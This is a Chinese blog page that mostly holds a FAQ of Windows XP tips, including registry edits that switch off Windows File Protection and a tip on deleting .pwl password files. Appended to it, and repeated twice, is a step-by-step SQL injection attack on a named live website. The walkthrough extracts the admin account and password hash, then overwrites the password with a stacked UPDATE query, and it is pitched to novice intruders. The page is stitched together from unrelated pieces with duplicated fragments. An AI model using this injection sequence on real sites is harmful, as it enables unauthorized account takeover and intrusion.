为了完全消除Windows文档保护功能,打开注册表编辑器,设置键值:HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,将SFCDisable的键值设置为 0xFFFFFF9D即可。
...
1、如何实现关机时清空页面文件打开“控制面板”,单击“管理工具→本地安全策略→本地策略→安全选项”,双击其中“关机:清理虚拟内存页面文件”一项,单击弹出菜单中的“已启用”选项,单击“确定”即可。
2、如何自行配置Windows XP的服务
如果你是在单机使用Windows XP,那么很多服务组件是根本不需要的,额外的服务程序影响了系统的速度,完全可将这些多余的服务组件禁用。单击“开始→控制面板→管理工具→服务”,弹出服务列表窗口,有些服务已经启动,有些则没有。我们可查看相应的服务项目描述,对不需要的服务予以关闭。如“Alerter”,如果你未连上局域网且不需要管理警报,则可将其关闭。
3、Smartdrv程序有什么作用
现象:在许多有关Windows XP安装的介绍文章中都提到:“如果在DOS下安装Windows XP非常慢,肯定是安装前未运行Smartdrv.exe。我想问这个Smartdrv.exe文件有什么饔?具体如何使用?
Smartdrv.exe这个文件对于熟悉DOS的朋友肯定很清楚,主要作用是为磁盘文件读写增加高速缓存。大家知道内存的读写速度比磁盘高得多,如果将内存作为磁盘读写的高速缓存可以有效提高系统运行效率。Smartdrv.exe这个文件在Windows各个版本的安装光盘中或是硬盘上的 Windows/command/里都有,只有几十KB,把这个文件复制到软盘下,启动系统后直接运行这个程序(可以不加参数,该程序会自动根据内存大小分配适当的内存空间作为高速缓存),再安装Windows XP即可。另外提醒大家,这个程序在安装完Windows后,不要运行,否则Windows可用内存将减少。
4、Win32k.sys是什么文件
现象:我刚装了Windows XP,可是接下去再装毒霸就发现病毒,位于F:\WINNT\ SYSTEM32里的Win32k.sys文件,删又不可删,隔离又不行,在Windows 98下或DOS下删就会导致Windows XP不可启动,请问该文件是干什么用的,有什么方法解决?
这个文件是Windows XP多用户管理的驱动文件。在X:\Windows\System32\Dllcache目录下有此文件的备份。只要将此备份拷到X:\Windows\ System32下替代带病毒的文件即可。做一张Windows 98启动盘,并将Attrib.exe文件拷入软盘,此文件在装有Windows 98的机器上的X:\Windows\Command目录下。在BIOS的Advanced BIOS Features 中将启动顺序调整为从A盘启动,进入DOS后,进入X:\Windows\System32目录,输入Attrib -s -h -r win32k.sys,再进入X:\Windows\System32\dllcache目录下输入同样命令,再用copy win32k.sys X:\windows\System32覆盖原文件,再重新启动即可。
5、Windows XP的开机菜单有什么含义
现象:最近我安装了Windows XP操作系统,我知道在启动时按F8键或当计算机不能正常启动时,就会进入Windows XP启动的高级选项菜单,在这里可以选择除正常启动外的8种不同的模式启动Windows XP。请问这些模式分别代表什么意思?
(1)安全模式:选用安全模式启动Windows XP时,系统只使用一些最基本的文件和驱动程序启动。进入安全模式是诊断故障的一个重要步骤。如果安全模式启动后无法确定问题,或者根本无法启动安全模式,那你就可能需要使用紧急修复磁盘ERD的功能修复系统了。
(2)网络安全模式:和安全模式类似,但是增加了对网络连接的支持。在局域网环境中解决Windows XP的启动故障,此选项很有用。
(3)命令提示符的安全模式:也和安全模式类似,只使用基本的文件和驱动程序启动Windows XP。但登录后屏幕出现命令提示符,而不是Windows桌面。
(4)启用启动日志:启动Windows XP,同时将由系统加载的所有驱动程序和服务记录到文件中。文件名为ntbtlog.txt,位于Windir目录中。该日志对确定系统启动问题的准确原因很有用。
(5)启用VGA模式:使用基本VGA驱动程序启动Windows XP。当安装了使Windows XP不能正常启动的新显卡驱动程序,或由于刷新频率设置不当造成故障时,这种模式十分有用。当在安全模式下启动Windows XP时,只使用最基本的显卡驱动程序。
(6)最近一次的正确配置:选择“使用‘最后一次正确的配置’启动Windows XP”是解决诸如新添加的驱动程序与硬件不相符之类问题的一种方法。用这种方式启动,Windows XP只恢复注册表项HklmSystemCurrentControlSet下的信息。任何在其他注册表项中所做的更改均保持不变。
(7)目录服务恢复模式:不适用于Windows XP Professional。这是针对Windows XP Server操作系统的,并只用于还原域控制器上的Sysvol目录和Active Directory目录服务。
(8)调试模式:启动Windows XP,同时将调试信息通过串行电缆发送到其他计算机。如果正在或已经使用远程安装服务在你的计算机上安装Windows XP,可以看到与使用远程安装服务恢复系统相关的附加选项。
6、如何彻底删除XP
现象:我装了Windows Me和Windows XP双系统,都是FAT32格式。C盘装Windows Me,E盘装Windows XP。昨天,Windows XP系统丢失了SYSTEM32.DLL,启动不了。于是我在进入Windows Me系统内,在E盘直接删除Windows XP。但是,每次开机都出现多系统启动菜单,供选择。我该怎样才可以彻底删除XP?
用一张Windows 9x/Me的启动盘启动,在“A:”下输入“SYS C:”,给C盘重新传系统即可。
7、如何处理Windows XP不能自动关机现象
现象:我的Windows XP有时候不能自动关闭电脑,请问应该怎么办?
安装完Windows XP之后,有些计算机在单击关闭电脑之后并不能自动关闭,而需像以前的AT电源一样手动关闭。这主要是Windows XP未启用高级电源管理。修正方法:单击“开始→控制面板→性能和维护→电源选项”,在弹出的电源选项属性设置窗口中,单击“高级电源管理”并勾选“启用高级电源管理支持”。
8、如何创建“锁定计算机”的快捷方式
因有急事而需要离开,但又不希望电脑进行系统注销,该怎么办?你完全可以通过双击桌面快捷方式来迅速锁定键盘和显示器,且无需使用“Ctrl+Alt +Del”组合键或屏幕保护程序。操作方法:在桌面上单击鼠标右键,在随后出现的快捷菜单上指向“新建”,并选择“快捷方式”。接着,系统便会启动创建快捷方式向导。请在文本框中输入下列信息:rundll32.exe user32.dll, LockWorkStation,单击“下一步”。输入快捷方式名称。你可将其命名为“锁定工作站”或选用你所喜欢的任何名称,单击“完成”。你还可对快捷方式图标进行修改(我最喜欢的一个是由Shell32.dll所提供的挂锁图标)。如需修改快捷方式图标,请执行下列操作步骤:右键单击“快捷方式”,并在随后出现的快捷菜单上选择“属性”。选择“快捷方式”选项卡,接着,单击“更改图标”按钮。在以下文件中查找图标文本框中,输入 Shell32.dll,单击“确定”。从列表中选择所需图标,并单击“确定”。你还可为快捷方式指定一组快捷键,比如“Ctrl+Alt+L”。这种做法虽然只能帮助你节省一次击键,但却可使操作变得更加灵便。如需添加快捷键组合,请执行下列操作步骤:右键单击“快捷方式”,并在随后出现的快捷菜单上选择“属性”。选择“快捷方式”选项卡,在快捷键文本框中,输入任何键值,而Windows XP则会将其转换成快捷键组合(一般应采取Ctrl+Alt+任意键的形式)。如欲锁定键盘和显示器,只需双击相关快捷方式或使用所定义的快捷键即可。
9、如何调整桌面图标颜色质量
在桌面空白处单击鼠标右键,在打开的“显示 属性”对话框中选择“设置”选项卡,通过“颜色质量”下拉列表你可以调整计算机的颜色质量。你也可以通过编辑注册表来调整桌面图标的颜色质量,具体操作步骤:
打开注册表编辑器,进入HKEY_CURRENT_ USER\Control Panel\Desktop\WindowMetrics子键分支,双击Shell Icon BPP键值项,在打开的“编辑字符串”对话框中,“数值数据”文本框内显示了桌面图标的颜色参数,系统默认的图标颜色参数为16。这里提供的可用颜色参数包括 :4表示16种颜色,8表示256种颜色,16表示65536种颜色,24表示1600万种颜色,32表示True Color(真彩色)。你可以根据自己的不需要选择和设置你的桌面图标颜色参数。单击“确定”关闭“编辑字符串”对话框。注销当前用户并重新启动计算机后设置就生效。
在桌面空白处单击鼠标右键,在打开的“显示属性”对话框中选择“外观”选项卡,在这里你可以方便地对整个桌面、窗口或者其他项目的字体和图标大小进行调整。
不过,用这种方式设置图标大小有一定局限性,比如,用户只能选择系统已经提供的桌面大小方案,不能自己任意设置桌面图标的大小。如果你想随心所欲地对桌面图标大小进行调整,可以通过编辑注册表来达到目的。具体操作步骤是: 打开注册表编辑器,进入HKEY_CURRENT_ USER\Control Panel\Desktop\WindowMetrics子键分支,双击Shell Icon Size键值项,在打开的“编辑字符串”对话框中,“数值数据”文本框内显示了桌面图标的大小参数,系统默认29,用户可以根据自己的需要设置参数大小 (参数越大,桌面图标也越大),然后单击“确定”关闭“编辑字符串”对话框。当你注销当前用户并重新启动计算机后设置就生效。
10、如何对系统声音进行选择与设置
系统声音的选择与设置就是为系统中的事件设置声音,当事件被激活时系统会根据用户的设置自动发出声音提示用户。 选择系统声音的操作步骤如下:
(1)在“控制面板”窗口中双击“声音及音频设备”图标,打开“声音及音频设备”属性对话框,它提供了检查配置系统声音环境的手段。这个对话框包含了音量、声音、音频、语声和硬件共5个选项卡。
(2)在“声音”选项卡中,“程序事件”列表框中显示了当前Windows XP中的所有声音事件。如果在声音事件的前面有一个“小喇叭”的标志,表示该声音事件有一个声音提示。要设置声音事件的声音提示,则在“程序事件”列表框中选择声音事件,然后从“声音”下拉列表中选择需要的声音文件作为声音提示。
(3)用户如果对系统提供的声音文件不满意,可以单击“浏览”按钮,弹出浏览声音对话框。在该对话框中选定声音文件,并单击“确定”按钮,回到“声音”选项卡。
(4)在Windows XP中,系统预置了多种声音方案供用户选择。用户可以从“声音方案”下拉表中选择一个方案,以便给声音事件选择声音。
(5)如果用户要自己设置配音方案,可以在“程序事件”列表框中选择需要的声音文件并配置声音,单击“声音方案”选项组中的“另存为”按钮,打开“将方案存为”对话框。在“将此配音方案存为”文本框中输入声音文件的名称后,单击“确定”按钮即可。如果用户对自己设置的配音方案不满意,可以在“声音方案”选项组中,选定该方案,然后单击“删除”按钮,删除该方案。
(6)选择“音量”选项卡,打开“音量”选项卡。你可以在“设备音量”选项组中,通过左右调整滑块改变系统输出的音量大小。如果希望在任务栏中显示音量控制图标,可以启用“将音量图标放入任务栏”复选框。
(7)你想调节各项音频输入输出的音量,单击“设备音量”区域中的“高级”按钮,在弹出的“音量控制”对话框里调节即可。这里列出了从总体音量到CD唱机、PC扬声器等单项输入输出的音量控制功能。你也可以通过选择“静音”来关闭相应的单项音量。
(8)单击“音量”选项卡中的“扬声器设置”区域中的“高级”按钮后,在弹出的“高级音频属性”对话框你可以为自己的多媒体系统设定最接近你的硬件配置的扬声器模式。
(9)在“高级音频属性”对话框中选择“性能”选项卡,这里提供了对音频播放及其硬件加速和采样率转换质量的调节功能。要说明的是,并不是所有的选项都是越高越好,你需要根据自己的硬件情况进行设定,较好的质量通常意味着较高的资源占有率。
设置完毕后,单击“确定”按钮保存设置。
11、如何分配临时管理权限
许多程序在安装过程中都要求你具备管理权限。这里介绍了一种以普通用户身份登录的情况下,临时为自己分配管理权限的简单方法。在右键单击程序安装文件的同时按住“Shift”键。在随后出现的快捷菜单中单击“运行方式”,输入具有相应管理权限的用户名和密码。这种方式对于开始菜单上的应用程序同样适用。
12、如何关闭Windows XP的自动播放功能
一旦你将多媒体光盘插入驱动器,自动运行就会从驱动器中读取数据,这会造成程序的设置文件和在音频媒体上的音乐立即开始。你可以用下面这个办法关闭这个功能:打开“开始→运行”,在对话框中输入“gpedit.msc”命令,在出现“组策略”窗口中依次选择“在计算机配置→管理模板→系统”,双击“关闭自动播放”,在“设置”选项卡中选“已启用”选项,最后单击“确定”按钮即可(图1-32)。
13、如何恢复被破坏的系统引导文件
现象:我只安装了Windows XP系统,但在开机时显示“BOOT.INI非法,正从C:\WINDOWS\启动”,然后就进入了启动状态,并且也能照样工作,请问这是怎么一回事,能否在不重装系统的情况下使系统恢复到正常启动状态?
出现这种情况是因为C盘下面的“Boot.ini”文件被破坏了。但是由于你的机器中只有一个操作系统,当然它就是默认的操作系统,即使“Boot.ini”文件被破坏了,也将自动地引导该系统进行装载。
解决的办法是建立一个“Boot.ini”文件即可。其内容为:
[Boot Loader]
Default=C:
[Operating Systems]
C:\=“Microsoft Windows xp”
14、如何恢复输入法图标
现象:本人使用Windows XP中文版,不慎使任务栏隐藏了输入法图标,请问该如何恢复输入法图标。
打开“控制面板”,双击“区域和语言选项”图标,进入“区域和语言选项”对话框,选择“语言”选项卡,单击“详细信息”按钮,在弹出的对话框中单击 “语言栏”按钮,在接着出现的“语言栏设置”对话框中勾选“在桌面上显示语言栏”选项。这时候桌面会出现语言栏,单击右上角的最小化按钮,输入法图标就回到任务栏中去了。
15、如何恢复误删除的boot.ini文件
现象:我第一次装Windows XP时,重启后没有任何问题。但是由于误操作,删掉了C盘目录下的一个文件(文件名是:boot.ini),然后再重启时每次都显示两行字: “boot.ini是非法的。现在正从C:/Windows/下启动”。然后可以顺利进入Windows XP。但是速度明显慢了,比没删这个文件时慢了很多,而且,每次都要看见那两行字。请问如何修复?
boot.ini是系统启动时,需要查询的一个系统文件,它告诉启动程序本计算机有几个操作系统、各系统的位置在哪里等信息。重新恢复的方法如下:单击“开始”菜单,依次指向“程序→附件→记事本”,打开“记事本”,在记事本里输入:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1) \Windows
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\Windows=“Microsoft Windows XP Professional” /fastdetect
然后将它保存为名字是boot.ini的文件,并将此文件保存到C盘的根目录下即可。
16、如何加快Windows XP窗口显示速度
我们可以通过修改注册表来改变窗口从任务栏弹出,以及最小化回归任务栏的动作,步骤如下:打开注册表编辑器,找到HKEY_ CURRENT_USER\Control Panel\Desktop\ WindowMetrics子键分支,在右边的窗口中找到MinAnimate键值,其类型为REG_SZ,默认情况下此健值的值为1,表示打开窗口显示的动画,把它改为0,则禁止动画的显示,接下来从开始菜单中选择“注销”命令,激活刚才所作的修改即可。
17、如何解决Windows XP关机出现英文提示
现象:我的Windows XP关机时会出现一个进度条,并提示“To return to windows and check the status of the program click cancel if you choose to end the program immediately you will lose any unsaved data. To end the program now click end.”然后就正常关机,但有时却不出现,我想会不会与我的东方影都3的记忆播放有关,但关闭记忆播放功能也无效,请问如何办?
这是因为你关闭Windows XP时还有程序在运行,请在关机之前保存并关闭一切应用程序。如果直接单击“End”按钮,那么未保存的任务会丢失,这时可以按“Ctrl+Alt+ Del”打开任务管理器,然后关闭应用程序。如果在任务管理器列表中为空,那么就在“系统进程”中将它关闭。如果不进行任何操作,那么系统将在进度条到头时自动关闭未关闭的程序并关闭系统。请你在关机之前关闭一切应用程序、系统驻留程序就不会出现这个提示了。当你确定没有任何需要保存的任务时,可以不必理会此对话框。
18、如何控制桌面的图标显示
通常很多用户还是习惯于在桌面上保留“我的文档”及其他经常访问文件夹快捷方式以及经常使用的程序快捷方式。如果你想在桌面上显示“我的电脑”、“我的文档”、“网上邻居”、IE浏览器的快捷方式图标,只需进行如下操作 :在桌面单击鼠标右键,在右键菜单中选择“属性”命令,在打开的“显示属性”对话框中选择“桌面”选项卡,单击“自定义桌面”按钮,打开“桌面”项目对话框。在“常规”选项卡的“桌面图标”栏中选择所需项目的复选框,然后单击“确定”返回上一级对话框,再单击“应用”按钮即可。
19、如何删除Windows XP的“更新”选项
对于大多数的用户来说,Windows XP的Windows Update功能似乎作用不大,我们可以去掉它,操作步骤如下:打开注册表编辑器,找到HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies\Explorer子键分支,选择“编辑”菜单下的“新建”命令,新建一个类型为REG_DWord的值,名称为NoCommonGroups,双击新建的NoCommon Groups子键,在“编辑字符串”文本框中输入键值“1”,然后单击“确定”按钮并重新启动系统即可。
20、如何设置音频属性
打开“控制面板”,双击“声音及音频设备”图标,在“声音及音频设备属性”对话框中,选择“音频”选项卡,在该选项卡中,你可以看到与“声音播放”、“录音”和“MIDI音乐播放”有关的默认设备。当你的计算机上安装有多个音频设备时,就可以在这里选择应用的默认设备,并且还可以调节其音量及进行高级设置。
进行音频设置的操作步骤如下:
(1)在“声音播放”选项组中,从“默认设备”下拉列表中选择声音播放的首选设备,一般使用系统默认设备。
(2)用户如果希望调整声音播放的音量,可以单击“音量控制”窗口,在该窗口中,将音量控制滑块上下拖动即可调整音量大小。
(3)在该窗口中,用户可以为不同的设备设置音量。例如,当用户在播放CD时,调节“CD音频”选项组中的音量控制滑块,可以改变播放CD的音量;当用户播放MP3和WAV等文件时,用户还可以在“音量控制”窗口进行左右声道的平衡、静音等设置。
(4)用户如果想选择扬声器或设置系统的播放性能,可以单击“声音播放”选项组中的“高级”按钮,打开 “高级音频属性”对话框,在“扬声器”和“性能”选项卡可以分别为自己的多媒体系统设定最接近你的硬件配置的扬声器模式及调节音频播放的硬件加速功能和采样率转换质量。
(5)在“录音”选项组中,可以从“默认设备”下拉列表中选择录音默认设备。单击“音量”按钮,打开 “录音控制”对话窗口。用户可以在该窗口中改变录音左右声道的平衡状态以及录音的音量大小。
(6)在“MIDI音乐播放”选项组中,从“默认设备”下拉列表中选择 MIDI音乐播放默认设备。单击“音量”按钮,打开“音量控制”窗口调整音量大小。
(7)如果用户使用默认设备工作,可启用“仅使用默认设备”复选框。设置完毕后,单击“应用”按钮保存设置。
21、如何设置语声效果
用户在进行语声的输入和输出之前,应对语声属性进行设置。在“声音和音频设备 属性”对话框中,选择“语声”选项卡,在该选项卡中,用户不但可以为“声音播放”和“录音”选择默认设备,而且还可调节音量大小及进行语声测试。
(1)在“声音播放”选项组中,从“默认设备”下拉列表中选择声音播放的设备,单击“音量”按钮,打开“音量控制”窗口调整声音播放的音量。要设置声音播放的高级音频属性,单击“高级”按钮完成设置。
(2)在“录音”选项组中,从“默认设备”下拉列表中选择语声捕获的默认设备,单击“音量”按钮,打开“录音控制”窗口调整语声捕获的音量。要设置语声捕获的高级属性,单击“高级”按钮完成设置。
(3)单击“测试硬件”按钮,打开 “声音硬件测试向导”对话框,该向导测试选定的声音硬件是否可以同时播放声音和注册语声。注释:要确保测试的准确性,在测试之前必须关闭使用麦克风的所有程序,如语声听写或语声通信程序。
(4)单击“下一步”按钮,向导开始测试声音硬件,并通过对话框显示检测进度。
(5)检测完毕后,打开“正在完成声音硬件测试向导”对话框,通告用户检测结果,单击“完成”按钮关闭对话框。
(6)设置完毕后,单击“确定”按钮保存设置。
22、如何手动使计算机进入休眠状态
现象:请问如何用手动方式使Windows XP的计算机进入休眠状态?
休眠功能是Windows XP提供的一项非常酷的特性,它“隐藏”在Shut Down(关机)对话框中。如果你的计算机支持休眠功能,那么借助以下技巧,可通过手动方式使其进入休眠状态。如需以手动方式使你的计算机进入休眠状态,请执行以下操作步骤:选择“开始→关闭计算机”,在关闭Windows对话框中,选择“休眠”。当你的计算机进入休眠状态后,内存中的内容将保存到硬盘上。当你将计算机唤醒时,进入休眠状态前打开的所有程序与文档都将恢复到桌面上。如需在你的计算机上激活休眠支持特性,请执行以下操作步骤:你必须以管理员、 Administrators或Power Users组成员的身份登录。如果你的计算机与某个网络建立了连接,那么网络策略设置可能会导致这一操作过程无法实现。单击“开始→控制面板→性能和维护 →电源选项”,选择“休眠”选项卡,选中“启用休眠”,单击“确定”关闭电源选项对话框。如果休眠选项卡不可用,则说明你的硬件设备无法支持该特性。
23、如何提高Windows XP的启动速度
使用微软提供的“Bootvis”软件可以有效地提高Windows XP的启动速度。这个工具是微软内部提供的,专门用于提升Windows XP启动速度。下载解压缩到一个文件夹下,并在“Options”选项中设置使用当前路径。之后从“Trace”选项下拉菜单中选择跟踪方式。该程序会引导Windows XP重新启动,并记录启动进程,生成相关的BIN文件。之后从Bootvis中调用这个文件,从Trace项下拉菜单中选择“Op- timizesystem”命令即可。
Windows XP虽然提供了一个非常好的界面外观,但这样的设置也在极大程度上影响了系统的运行速度。如果你的电脑运行起来速度不是很快,建议将所有的附加桌面设置取消,也就是将Windows XP的桌面恢复到Windows 2000样式。
设置的方法非常简单:在“我的电脑”上单击鼠标右键,选择“属性”,在“高级”选项卡中单击“性能”项中的“设置”按钮,在关联界面中选择“调整为最佳性能”复选框即可。
此外,一个对Windows XP影响重大的硬件就是内存。使用256MB内存运行Windows XP会比较流畅,512MB的内存可以让系统运行得很好。如果条件允许,最好增大内存。
24、如何为Windows XP减肥
Windows XP比以往的任何Windows系统都要庞大,其硬盘空间需求1.5GB。虽然相对于能跑Windows XP的主流电脑来说,一般都拥有10GB以上的硬盘,但一些电脑发烧友有时还是乐于减少Windows XP的体积。
(1)删除驱动备份 :Windows\Driver cache\i386目录下的Driver.cab文件(73MB) 。
(2)删除Help文档(减掉40多MB) 。
(3)删除Windows\Ime下不用的输入法(日文、韩文、约80MB) 。
(4)把我的文件、IE的临时文件夹转到其他硬盘(分区) 。
(5)把虚拟内存转到其他硬盘(分区)。
25、如何卸载Windows XP
现象:我原来使用的操作系统是Windows 98,最近听说Windows XP非常好,就安装了该系统。第一次安装是从Windows 98中安装,装完后觉得不太好,就格式化Windows XP的分区后重新从DOS安装到D盘,安装完后发现多重启动菜单有三项(第一次装的Windows XP那一项还在),请问如何删除多余的一项?另外,如果我要删除Windows XP,除了格式化D盘外,怎样才能将它彻底删除?
Windows 98和Windows XP双系统的启动菜单是由C盘根目录下的一个文件来控制的,通过修改该文件可以更改启动菜单。要想删除多余的Windows XP项目,你可以打开C盘根目录下的boot.ini文件,其中有两行重复的“multi(0)…”,删除其中一行即可。要想彻底删除Windows XP,除了格式化它所在分区之外,你还必须按下面的方法删除多重启动菜单和多余的系统文件:
(1)制作一张Windows 98启动盘,并将Windows 98下的sys.com文件拷入该系统盘。
(2)用该启动盘启动,在A:>下执行sys C:命令。
(3)删除C盘根目录下多余的文件,这些文件包括:boot.ini、bootfont.bin、bootsect.dos、ntdetect.com、pagefile.sys等。
26、如何隐藏桌面图标
在Windows XP中增加了隐藏桌面图标的功能,你只需用鼠标单击桌面空白处,在弹出的右键菜单中选定“排列图标”命令,然后在其下一级级联菜单中取消对“显示桌面图标”命令的选定,系统就会自动将所有桌面图标隐藏。
如果桌面上图标数量较多,可以用以下方法重新排列图标 :在桌面空白区域单击鼠标右键,在弹出菜单中选择“排列图标”,然后在下一级菜单中单击图标排列规则即可。
利用Windows XP的“桌面清理”功能,可将你桌面上不使用的图标清理掉。方法是:在上面的“桌面”项目对话框的“常规”选项卡中,如果你选中“每60天运行桌面清理向导”复选框,系统就会每60天自动运行一次桌面清理向导,帮你清理掉桌面上不使用的图标。如果你单击“现在清理桌面”按钮,则系统会立即打开桌面清理向导,将你不使用的快捷方式图标移到一个名为“未使用的桌面快捷方式”的桌面文件夹中。该向导不移动、更改和删除任何程序,如果你想将某个图标重新移回桌面,可以从“未使用的桌面快捷方式”的桌面文件夹中将其还原。
27、如何在Windows XP中进行繁体字输入
使用微软拼音3.0可以进行繁体字输入,你可在系统中选择微软拼音输入法,单击“选项”并在其中选中简、繁转换项,这时输入法状态条中就会有简、繁转换按钮,需要使用它切换即可进行繁体字输入了。
当然还有其它更多的方法,就不再一一详述了。
28、如何找回两台电脑相连图标
现象:我的电脑装的是Windows XP,在上网时系统托盘内的两台电脑相连的小图标不见了,使我经常不知道是否在线。请问应如何将它恢复?
小图标不见了的原因在于网络连接的属性设置不对。在Windows 98中拨号连接上互联网后,该连接的小图标将自动显示在任务栏上。如果小图标不见了,可右击“我的连接”,选择“属性→设置→选项”,选中“显示调制解调器状态”即可恢复。在Windows 2000和Windows XP中,用户可以控制和设置连接图标的显示和隐藏功能。具体的方法是打开拨号连接或者网络连接的“属性”对话框,然后选中或者清除“连接后在通知区域显示图标”复选框,就可以实现该图标的显示或隐藏了。
29、如何制作自动系统恢复软盘
现象:我在Windows XP下未找到制作紧急修复磁盘的界面,请问如何制作?另外我的Windows 98每次启动时都提示输入用户名与密码,请问如何消除?
Windows XP的紧急修复磁盘准确的名称应该是“自动系统恢复(ASR) 软盘”,它可以备份那些启动系统所需的系统文件。制作方法是:单击“开始→所有程序→附件→系统工具”,然后单击“备份”,单击备份工具向导中的“高级模式”按钮。在“工具”菜单上,单击“ASR 向导”;然后按照屏幕上的提示进行操作即可(注意:事先应准备好保存系统设置的1.44MB的空软盘)。使用方法也很简单:将Windows XP系统的安装光盘插入CD驱动器中,重新启动计算机。在出现安装界面时,按F2,系统将提示你插入以前创建的ASR软盘(ASR不会还原数据文件)。请按照屏幕上的向导进行操作即可自动恢复系统。另外,即使没有 “自动系统恢复(ASR) 软盘”,也可以使用“修复”功能恢复Windows XP系统引导菜单,只是某些个人的特殊设置会被恢复成默认设置,使用“自动系统恢复(ASR) 软盘”则不会。
Windows 98每次启动时都提示输入用户名与密码,可以按“Esc”键进入Windows 98桌面,这时可以将Windows目录下的密码文件*.pwl删除。例如用户名为“qq”,相应的密码文件就是“qq.pwl”,找到它并删除它,然后重新启动电脑,在出现登录窗口时输入原来的用户名“qq”,密码不填,这样就可以消除了。
30、如何自动关闭停止响应的程序
在Windows XP操作系统中,这个设置可以使Windows XP当诊测到某个应用程序已经停止响应时可以自动关闭它,而不需要进行麻烦的手工干预。想要实现这个功能,就请单击“开始→运行”输入“Regedit” 打开注册表编辑器,找到HKEY_CURRENT_USER\Control Panel\Desktop分支,将Auto End Tasks的键值设置为1即可。
31、为何不能安装Windows XP
现象:我用Windows 98启动盘启动计算机并安装Windows XP,整整花了6个小时才完成,听朋友说他在一台配置和我一样的机器上只花了1个小时的时间就完成了Windows XP的安装(也是用Windows 98启动盘启动),请问Windows XP正确的安装方法是怎样的?
这是因为你没有加载磁盘高速缓存的缘故。此文件在Windows 98的安装目录下,名为smartdrv.exe,将其拷入软盘,安装之前运行一下就可以了。另外你可以将启动顺序设为从光盘启动,这样Windows XP的安装盘会自动加载磁盘高速缓存。
32、为何不能在Windows XP下安装软件
现象:我在一台安装有Windows XP 家庭版的微机上安装软件时出现“You do not have access to make the requried system configuration modifications. Please return this installation from an administrators account.”。请问这是为什么?这种软件在Windows 98下可正常安装。请问如何解决?
Windows XP为了保护系统的安全和稳定,使用了用户账户和密码保护的方式来控制用户的操作。即只有指定的人才能干指定的事情。安装软件等修改系统的操作需要用户拥有该计算机管理员的权力才能执行,这就是你为什么不能安装软件的原因,相信还有很多操作你都执行不了。
系统在安装时,默认“administrator”帐号是管理员的身份,你可以采用下面的方法使自己成为管理员:
(1)首先要以管理员的身份进入计算机。单击“开始”菜单上的“注销”,确认进入等待登录的画面,同时按下键盘上的“Ctrl+Alt+Del”键。
(2)在弹出的对话框中,在用户名框中输入“administrator”,密码框中输入安装时设置的密码。如果你在安装时没有设置密码,密码当然为空,然后回车进入计算机。
(3)打开“控制面板中”的“用户账户”,就会看到自己的用户账户,在旁边写着“受限的账户”。
(4)单击打开自己的账户,然后单击“更改账户类型”。在弹出的窗口中,单击选中“计算机管理员”的单选按钮,然后单击“更改账户类型”按钮,确认并退出。你现在就可以干自己想做的事情了。
为了保证计算机的安全,建议用户设置用户密码,以避免发生安全问题而遭到不必要的损失。
33、为何更改硬件配置就出现死机现象
现象:在Windows XP中只要一更改硬件配置,系统就启动不了,如何解决?
这是因为Windows XP中使用了激活产品程序,激活产品程序是微软在Windows XP中最新加入的防盗版功能。由于激活产品程序会根据你的电脑硬件配置生成一个硬件号,因此如果你改变了改硬件配置,激活产品程序就会发现硬件配置与之不符,这时系统就会停止运行并要求你重新激活产品才可以重新运行。
34、为什么Windows XP磁盘可用空间不断减少
现象:我使用Windows XP时发现,随着不断地增加、删除应用程序,磁盘可用空间不断减少,这是为什么?
从Windows 2000开始,Windows会在每个硬盘分区中建立一个“System Volume Infor-mation”文件夹,在该文件夹中提供的是系统默认保存的系统还原备份文件。不过Windows 2000还没有正式提供系统还原功能,在Windows XP中,你可以看到相关的选项。
为防止这个问题发生,最简单的方法就是关闭“系统还原”功能。如果要删除这个文件夹中保存的文件,你需要以Administrator(管理员)身份登录系统。
35、为什么Windows XP所占空间很大
现象:安装了Windows XP后,使用一段时间发现经常登陆的一个用户的文件夹所占的空间特别大,大约1.2GB;可是其他不常登陆的只有10MB左右,这是怎么回事?
Windows XP为每个用户都设置了各自的文件夹,把登录用户在使用过程中的操作都记录下来,同时也产生各自的临时文件,上网缓存文件,安装软件时产生的共用文件(软件中共用),所以常登录的用户文件夹必然很大。把临时文件与上网的缓存文件删除可以省出很多空间。
36、如何消除Windows XP的文档保护功能
怎样消除Windows XP的文档保护功能?
为了完全消除Windows文档保护功能,打开注册表编辑器,设置键值:HKEY_LOCAL_ MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon,将SFCDisable的键值设置为 0xFFFFFF9D即可。
...
24 2009-12
分类:技术文章 | 评论:0 | 浏览:
在线破解MD5的网站上查。但有的MD5密码很偏,所以一些新手会放弃。我为新手介绍一种很简单就能修改难猜解MD5密码的方法。
常入侵的高手就忽略过..
随便找个地址
http://www.592long.cn/news.asp?id=121
在地址后输入单引号,显示
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
字符串 ’’’ 之前有未闭合的引号
/news/wantpws.asp,行63
说明没有过滤单引号且数据库是MSSQL.
and 1=1出错。and 1=2正常。
接着输入
http://www.592long.cn/news.asp?id=1 or admin_user in (select id from admin)
得到帐号为:admin
http://www.www.592long.cn/news.asp?id=121 or admin_password in (select id from admin)
得到密码为:a4716077c2ba075c
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
键入 :
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’--
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的。
扫一下后台为
http://www.592long.cn/admin/admin_login.asp
...
常入侵的高手就忽略过..
随便找个地址
http://www.592long.cn/news.asp?id=121
在地址后输入单引号,显示
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
字符串 ’’’ 之前有未闭合的引号
/news/wantpws.asp,行63
说明没有过滤单引号且数据库是MSSQL.
and 1=1出错。and 1=2正常。
接着输入
http://www.592long.cn/news.asp?id=1 or admin_user in (select id from admin)
得到帐号为:admin
http://www.www.592long.cn/news.asp?id=121 or admin_password in (select id from admin)
得到密码为:a4716077c2ba075c
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
键入 :
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’--
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的。
扫一下后台为
http://www.592long.cn/admin/admin_login.asp
...
24 2009-12
分类:技术文章 | 评论:0 | 浏览:
来源:http://www.qi21.cn
